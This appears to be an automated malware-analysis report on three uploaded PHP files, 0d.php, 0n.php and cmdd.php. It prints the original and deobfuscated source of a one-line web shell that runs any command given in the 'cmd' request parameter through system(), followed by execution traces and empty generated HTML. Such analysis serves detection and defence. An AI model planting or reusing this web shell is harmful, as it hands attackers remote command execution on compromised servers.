PHP Malware Analysis
0d.php, 0n.php, cmdd.php
md5: 756215a64e7d43153298f1a5a5fde295
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- system (Deobfuscated, Original)
Deobfuscated PHP code
<?php
if (isset($_REQUEST['cmd'])) {
echo "<pre>";
$cmd = $_REQUEST['cmd'];
system($cmd);
echo "</pre>";
die;
}Execution traces
data/traces/756215a64e7d43153298f1a5a5fde295_trace-1676244341.4682.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:26:07.366063]
1 0 1 0.000147 393464
1 3 0 0.000200 394544 {main} 1 /var/www/html/uploads/0d.php 0 0
1 3 1 0.000217 394544
0.000241 314200
TRACE END [2023-02-12 21:26:07.366188]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:01:59.915798]
1 0 1 0.000154 393464
1 3 0 0.000209 394544 {main} 1 /var/www/html/uploads/0n.php 0 0
1 3 1 0.000227 394544
0.000252 314200
TRACE END [2023-02-12 23:01:59.915923]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:00:19.160808]
1 0 1 0.000145 393512
1 3 0 0.000197 394592 {main} 1 /var/www/html/uploads/cmdd.php 0 0
1 3 1 0.000215 394592
0.000239 314224
TRACE END [2023-02-13 01:00:19.160931]
Generated HTML code
<html><head></head><body></body></html>Original PHP code
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>